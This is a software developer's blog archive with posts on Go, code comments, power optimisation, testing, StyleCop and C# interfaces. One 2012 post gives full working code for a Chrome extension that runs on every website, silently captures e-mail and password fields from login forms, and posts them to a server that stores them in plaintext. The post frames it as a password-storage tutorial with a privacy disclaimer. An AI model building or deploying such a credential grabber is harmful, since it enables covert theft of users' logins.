Monday, January 22, 2018

Why Golang?

After some time working with the Go programming language (also known as Golang), I decided to ask myself "why Go?". OK... what I actually searched for was "why golang"; if you are a Go programmer, you know how hard it is to use the term "go" in searches.

This language became part of my life after I decided to change jobs and move to another company. The new company's engineering team was using Go as its main programming language. I did not ask myself about this point earlier because I believed in the strengths of each member of the new team (I already knew about the excellence of the developers at Tempest Security Intelligence) and was also curious to learn a new language. I joined the crew and navigated as commanded, until now.

Just to make it clear before starting: I am not dissatisfied with Golang. The question arose more as a way to answer for myself why I had never used it before. In my opinion, it is an excellent programming language for writing a backend API served over HTTP and also for creating Unix-based tools. Some years after its creation, Go is becoming so popular that many companies in Brazil (such as Mercado Livre, Globo.com, Magazine Luiza, and Walmart) are changing their backend solutions to use Go instead of other languages.

Previously I have worked with several different programming languages using many different tools. Because of that, I know Go still lacks good free developer tools. But in my opinion the language itself is worth it, even without some fancy tools. I was never (and still am not) a programming language fanatic; I just pick what is better for each situation or, sometimes, what a client requests. Even though I am really satisfied with Go, this is not a love letter.

Golang may appear more verbose when compared with some other languages, but its simplicity makes it easy to learn (mainly for Java and C programmers). Dave Cheney wrote about Go's simplicity and mentioned that "what makes Go successful is what has been left out of the language, just as much as what has been included". Given my experience with Java, I still miss some features, such as annotations, to ease my API definitions, but the usage of middlewares allows me to live in peace without them.

Even raising my points, I will not go into detail about each benefit that makes me accept Go as a good language for a backend API. There are a lot of texts on the subject, some of them comparing Go with other languages. Enjoy yourself:


Getting back to my personal experience, some of the most valuable benefits of using Go are: the possibility to deploy with just a binary replacement, easy communication between concurrent tasks using channels and goroutines, and an error handling structure that keeps the code very clean. Golang also has pointers, making it easy to tell whether something is a value or a reference, but it also has garbage collection, allowing developers to live well without manually freeing memory.
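As a rough sketch of the channels and error handling points (the fetch function below is a made-up example, not real API code), concurrent work can report results and errors back through a channel, with errors being plain values returned alongside the result:

```go
package main

import (
	"errors"
	"fmt"
)

// fetch simulates work that can fail; in Go, errors are plain values
// returned alongside the result.
func fetch(id int) (string, error) {
	if id < 0 {
		return "", errors.New("invalid id")
	}
	return fmt.Sprintf("result-%d", id), nil
}

func main() {
	results := make(chan string)

	// Fan out: one goroutine per id, each sending its outcome
	// back through the channel.
	for i := 1; i <= 3; i++ {
		go func(id int) {
			res, err := fetch(id)
			if err != nil {
				results <- "error: " + err.Error()
				return
			}
			results <- res
		}(i)
	}

	// Collect the three outcomes (arrival order is not guaranteed).
	for i := 0; i < 3; i++ {
		fmt.Println(<-results)
	}
}
```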

But what is most valuable for me is that Go has a very simple set of standard libraries focused on today's problems. To illustrate, let's listen on port 8080 to provide some web content:
package main
import (
  "fmt"
  "net/http"
)
func main() {
  http.HandleFunc("/",
      func(w http.ResponseWriter, r *http.Request) {
        fmt.Fprintf(w, "Here goes my HTTP response...")
      })
  http.ListenAndServe(":8080", nil)
}
That is it: no web container, no runtime dependency, no separate server. Just build, deploy, and run. In the end, I believe Go's simplicity is the key feature needed to deliver good products.

Sunday, December 23, 2012

Creating a Google Chrome extension to store passwords

Google Chrome provides the possibility to create applications (extensions) that are executed in the browser. To start writing these kinds of applications, the developer page has very good documentation on how to start and an overview of extensions. This post aims to demonstrate a simple way to communicate with a server to store login attempts (with e-mail and password) in a file. The data to be stored will be retrieved from a known web page. It is possible to find many password storage applications that do something similar on the Chrome Web Store.


Important notice: the knowledge obtained here must be used consciously. Please do not infringe on anyone's privacy rights.


Everything starts in the manifest.json file. It is the entry point that contains the information about the extension. For this sample, the manifest contains the following information.

{
    "name": "<extension name>",
    "version": "1.0",
    "manifest_version": 2,
    "content_scripts": [
        {
            "matches": [
                "http://*/*",
                "https://*/*"
            ],
            "js": ["contentscript.js"]
        }
    ],
    "background": {
        "scripts": ["background.js"]
    },
    "permissions": [
        "http://*/*",
        "https://*/*"
    ],
    "description": "<extension description>"
}

Extension code can be written in JavaScript. The files contentscript.js and background.js referenced in the manifest contain the code of the extension, and each one will be explained in this post.


First, in this example, the web page whose password will be saved has an HTML form like the following one. In this form, the label tag wraps the login button.

<form id="login_form">
    <input type="text" id="email">
    <input type="password" id="pass">
    <label id="loginbutton">
        <input type="submit">
    </label>
</form>

One of the features of Chrome extensions is that they can have JavaScript code executed in the context of the web page, by means of content scripts. This feature is used in this sample by the contentscript.js file. The approach used here was to find the HTML form and label elements of the web page and add a listener to each one, which was done by adding the following code to the contentscript.js file.

// function to be called by the login button click
function onLogin() {
    ...
}

// retrieve the login button and form elements of the page
var loginButton = document.getElementById("loginbutton");
var loginForm = document.getElementById("login_form");

// verify if the login button exists
if (loginButton) {    
    // add a click listener to the button
    loginButton.addEventListener("click", onLogin, false);
}

// verify if the login form exists
if (loginForm) {    
    // add a submit listener to the form
    loginForm.addEventListener("submit", onLogin, false);
}

The next step is to implement the onLogin() function, which will be called when the user tries to log in. This function extracts the "email" and "pass" elements of the page. If the code is able to find these elements, it builds the content to be stored from their values.

function onLogin() {
    // retrieve the login and pass elements
    var mail = document.getElementById("email");
    var pass = document.getElementById("pass");
        
    // verify if the elements exist
    if (mail && pass) {        
        // create the content to be saved
        var content =
            "login attempt with " + mail.value +
            " and pass " + pass.value +
            " on the domain " + document.domain;
           
        // save the content
        saveContent(content);
    }
}

Note that a function named saveContent() was called. This function will contain something like the code below.

function saveContent(content) {   
    chrome.extension.sendMessage(
        {greeting: content},
        function(response) {
            // silence
        }
    );
};

The saveContent() function receives the data and sends it in a message. This message will be received by the background page, represented by the background.js file. The code on the background page that receives the message is the following.

// send a string value to be saved on server
function saveOnServer(content) {
    ...
};

// create a listener to the messages
// that come from the content script
chrome.extension.onMessage.addListener(
    function(request, sender, sendResponse) {
        // save the content on the server
        saveOnServer(request.greeting);
    }
);

The saveOnServer() function makes an HTTP POST request to the server in order to store the data. The server used here runs PHP, and the page that stores the content is http://localhost/sample/sample.php.

// send a string value to be saved on server
function saveOnServer(content) {
    var url = "http://localhost/sample/sample.php";
    // encode the value so special characters survive the form encoding
    var params = "content=" + encodeURIComponent(content);
        
    // create the XMLHttpRequest to send
    // the informations to server
    var http = new XMLHttpRequest();  
    http.open("POST", url, true);

    // send the proper header information
    http.setRequestHeader(
        "Content-type",
        "application/x-www-form-urlencoded"
    );

    // call the function when the state changes.
    http.onreadystatechange = function() {
        if(http.readyState == 4 && http.status == 200) {
            // it could be alert(http.responseText);
            // but silence
        }
    }

    // send the parameters
    http.send(params);
};

The HTTP request was made on the background page because of the same-origin policy. It uses the cross-origin XMLHttpRequest feature, which allows an extension to access remote servers outside of its origin.


Another file used in this example is sample.php, which is accessed by the XMLHttpRequest of the background page. The technology used on the server could be replaced by any other. The code of the sample.php file is shown below; $filename defines where the file must be stored.

<?php
    $filename = 'C:\\sample\\sample.txt';
    $param = $_POST["content"];
    $content = " ----- " . $param . " ----- " . "\n";

    if (!$handle = fopen($filename, 'a')) {
         echo "cannot open file ($filename)";
         exit;
    }

    if (fwrite($handle, $content) === FALSE) {
        echo "cannot write to file ($filename)";
        exit;
    }

    echo "($content) written on file ($filename)";

    fclose($handle);
?>

In this sample, the password was stored in a file on the server without any kind of encryption. This post carries a lesson: it shows that it is necessary to understand the risks of using software that stores passwords, and important not to trust every application with this purpose. The information here gives a developer the means to create his own application and keep control over the data being handled. But of course, there are many other security concerns that a developer must take care of while creating this kind of application.

Tuesday, November 1, 2011

Writing good (no) comments

Have you ever written something for someone else to read? Of course you have! We are always writing something for someone, even for ourselves. And this is how I want to start defending my idea: writing a piece of software is just like writing a simple text, an article, a paper, or even a book. You write it, and you write it clearly, so anyone (even yourself) can read it later.


Let’s see an example of that. Suppose you are writing an e-mail to a friend of yours. Do you write comments about what you wrote? Let me show you:

“Dear ‘Friend of Mine’, how are you? Have you started reading that book? (comment: I’m talking about the book of John Doe). I have just finished the reading of that other book (comment: I’m talking about Alice Cooper book) and I’m wondering if I can go there (comment: your house) and get another book.“

Will your friend understand what you wrote? Probably yes! But is it a good read? Can you read it smoothly? Probably not! Why not put all the information that is in the form of comments inside the text itself? Let’s see how it could be:

“Dear ‘Friend of Mine’, how are you? Have you started reading John Doe’s book? I have just finished the reading of the Alice Cooper one. And I was wondering if I can go to your house and get another one.”

If you are reading this blog you are probably a developer! And if so, you have also started to get what I’m trying to say here. Writing software is just like writing a piece of text; the only difference is that you are writing instructions, in a different language.


There is also a problem: most of us write code in a way that is just enough for the computer to understand. If it compiles, then the computer will understand it and the code is OK. That’s not true! The computer is not the only one that is going to read that “text”. If your software is not dead, you will read the source code later, other developers will, and even good testers will probably want to read it too.


I like a sentence that I’ve read in uncle Bob’s book, Clean Code, that says:

“The proper use of comments is to compensate for our failure to express ourself in code.”

He means that if we need to write a comment in our code to explain what we are doing, it means we are not skilled enough, in the language we are using, to express ourselves. Reading Uncle Bob’s book awoke me to caring about my code. But getting this point of view, about self-expression in source code, was the most valuable jewel I found in it.


I can’t dive into all the bad things about writing comments; that would be a “copy” of his book. So I prefer to encourage you to read the entire book, especially chapter 4.


I also want to close this post by citing Steve McConnell:

"Good code is its own best documentation. As you're about to add a comment, ask yourself, 'How can I improve the code so that this comment isn't needed?'"

Tuesday, October 18, 2011

How far goes the systems optimization?

One field of computing that has gained a lot of strength is ubiquitous computing, which supports the idea of providing processing capacity to things we use every day, like microwave ovens, smartphones, tablets, and other equipment. Because of that, the industry is producing many devices with low-cost processors called microcontrollers, able to perform ever more complex tasks.


Most of this equipment runs on batteries and therefore has a limited power supply. Considering this limitation, the scientific community has done much research on optimizing software execution on these devices so that they consume a smaller amount of energy without much impact on performance. In this post I intend to discuss some techniques for doing that.


Some preliminary studies focused on low power consumption were based on a technique that scales voltage and frequency during software execution. Furthermore, this technique selects the operating mode of the system as a whole, without considering the status of each device. This technique, called DPM, is based on the principle that CPU power consumption decreases with the cube of the voltage, while frequency scales linearly with voltage.
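As a quick sanity check on that cube relation, it follows from the usual dynamic-power model (a sketch; here $C$ denotes the switched capacitance, $V$ the supply voltage, and $f$ the clock frequency):

```latex
P_{dyn} \approx C \, V^{2} f, \qquad f \propto V
\;\Longrightarrow\; P_{dyn} \propto V^{3}
```

So halving the supply voltage (and the frequency with it) cuts dynamic power to roughly one eighth.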


From this initial idea emerged other frameworks [1][2] that began to consider the status and workload of each device, as well as to analyze the energy consumed by each module, identifying the points of the system that consume the most energy. With that, the system designer can refactor the software to use those parts only when they are really necessary. As an example, we can cite the smartphones sold nowadays: they can detect when the remaining battery charge is low and, in that case, reduce the display brightness and the use of network resources.


Another line of studies supports refactoring and optimizing source code so that the whole system executes in the device's SRAM. This type of memory, as we know, has extremely fast data access and consumes less energy than the DRAM memories usually used in desktop computers.


This text is only a general view of some of the research conducted to build systems with low power consumption. In the end, writing good code is not just a matter of maintainability but also of power saving, which helps ubiquitous computing become a reality. So dive into it.

Tuesday, October 11, 2011

Developers vs Testers... Fight!!!

This text is a review of the one posted on Bytes Don't Bite.


Should people who work with software testing have development skills? Business knowledge is necessary for professionals in the testing area, but understanding the structure of what is being tested, which is primarily software, is also important.


James Whittaker, who worked at Microsoft on testing and currently works at Google, wrote a book that demonstrates some techniques to "break" software. The faults displayed are interesting and likely to be achieved with a black-box approach. The book demonstrates failures that can be caused through the user interface or through other software. Whittaker also says that many developers have difficulty understanding the environment in which their software works.


In the experience I have had with software testing so far, I have had the opportunity to work with several kinds of testers who only interact with buttons, or other visual components, offered through specifications. Such testers disregard the file system, external components, the operating system, the network, relationships with other features, etc.


With this post, I want to encourage a fight.


Software testers, you must learn where developers leave the bugs. Believe me, most software failures are in the code! Consider different ways to find the problems. Understand the operating system, examine the software's source code, understand networks, study the shortcomings of the frameworks used, study how to verify the security of the product (do not use the excuse that security is a non-functional requirement); consider everything that is valid to ensure software quality.


Developers, will you let the testers break your code? See what these testers can do with the code you produce! Get close to the testers' way of thinking and see how they act. Develop critical thinking. Work hard to keep common flaws from happening. Study where bugs appear, so you can avoid them!


In the end, this healthy dispute between preventing and finding bugs is a way to get quality software and a team in continuous evolution.

Tuesday, September 20, 2011

Microsoft Source Analysis for C#

Unless you are already used to it (and we hardly are), one of the hardest things when writing code is to keep it well documented and well formatted, so everyone (even ourselves) can understand what is written.


Computers cannot review our source code, yet! Thinking about that, a Microsoft employee developed a tool called StyleCop that, although not used by everyone within the company, has greatly helped lots of teams keep their code well organized.


Here you can find the history of the tool and a short explanation of why some Microsoft employees do not follow the (roughly) 200 rules established by StyleCop.


The tool integrates quite well with Visual Studio, allowing different configurations for each project. Downloading the SDK allows you to customize it and even write your own rules. There is also a plugin for StyleCop called StyleCop+, with lots of other rules that can be used to standardize the source code of your project.

Tuesday, September 6, 2011

List or IList: that is the question

One day, during a conversation at work, a question arose: why do so many developers always refer to List&lt;T&gt; instead of IList&lt;T&gt; in C#? No convincing answer to this question appeared. Thus the principle of depending on abstractions, and not on concrete implementations, was being neglected.


Apparently it was not the first time this question had appeared. And it is possible to notice that most developers using List&lt;T&gt; instead of IList&lt;T&gt; had been Java programmers one day. Is this the reason?


In C# it is common to use the letter "I" at the beginning of interface names. People who have programmed in Java might be confused, since List represents an interface (in Java) while LinkedList and Stack are examples of implementations. It is also important to note that in C#, LinkedList&lt;T&gt;, Queue&lt;T&gt;, and Stack&lt;T&gt; do not implement IList&lt;T&gt;, because they do not provide access by index.


It became necessary to understand the generic class List&lt;T&gt; and the interfaces it implements (IEnumerable&lt;T&gt;, ICollection&lt;T&gt;, IList&lt;T&gt;, IEnumerable, ICollection, and IList). Thus, such interfaces could be used as references instead of the concrete class.


With that understanding of interfaces in mind, it was necessary to do some refactoring in the code where List&lt;T&gt; was being used. At first, we replaced at least the return type of a method from IList&lt;T&gt; to IEnumerable&lt;T&gt;. With this change some compilation errors appeared: the Add(T) method was missing. But with ICollection&lt;T&gt; the code worked normally. In some other cases IEnumerable&lt;T&gt; met the need, because the code only had to iterate over the returned items.


Later, we found a situation where it was necessary to access a specific item of the structure, which was solved by using the IList&lt;T&gt; interface as the return type. At that point an AddRange(IEnumerable&lt;T&gt;) method of List&lt;T&gt; was being used, which could easily be replaced with an extension method on ICollection&lt;T&gt;.


But after all this, question number two came up: were all operations being conducted in the correct place? Since the return type of each method was more deliberate, it was easier to notice that certain classes were doing more than they should.


In the end, the refactoring was successful: the return types of all methods that were using List&lt;T&gt; were replaced by an appropriate interface. With a little more research, it was possible to notice that it was not only developers accustomed to the List interface in Java who were referring to List&lt;T&gt; in C#; many people use the reference to List&lt;T&gt; because of the resources provided by the implementation. A method such as AddRange(IEnumerable&lt;T&gt;) could be called anywhere. A tempting proposal. However, relying on abstractions makes the code more flexible. And relying on interfaces that contain only the necessary functionality keeps a class from trying to do what should not be its responsibility.